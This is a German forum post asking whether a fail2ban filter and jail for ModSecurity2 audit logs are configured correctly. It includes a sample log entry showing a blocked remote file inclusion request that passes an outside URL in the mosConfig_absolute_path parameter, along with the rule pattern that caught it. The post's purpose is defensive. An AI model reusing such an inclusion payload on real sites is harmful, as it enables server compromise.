Ich hab es mal so probiert:
In filter.d angelegt: apache-modsec.conf
Code:
[Definition]
# Option: failregex
# Notes.: regex to match the password failure messages in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching.
# Values: TEX
#
failregex = [[]client <HOST>[]] Message: Access denied with code 403
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
in jail.conf:
Code:
[apache-modsec]
enabled = true
port = http
filter = apache-modsec
logpath = /var/log/apache*/mod-security2.log
maxretry = 1
Ich nutze modsecurity2 welches nach /var/log/apache*/mod-security2.log loggt.
Ist das oben soweit richtig zu diesem Log bzw. funktioniert das so?
Die IP des Angreifers steht in der ersten Zeile und dahinter gleich die meines Servers.
Die Logeinträge sehen so aus:
Code:
--e97c4236-A--
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80
--e97c4236-B--
GET /content/view/20/38//?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.tld.tld
User-Agent: libwww-perl/5.808
--e97c4236-F--
HTTP/1.1 403 Forbidden
Last-Modified:
ETag: "119xxxxxxxxxxx56540"
Accept-Ranges: bytes
Content-Length: 1136
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1
--e97c4236-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
--e97c4236-Z--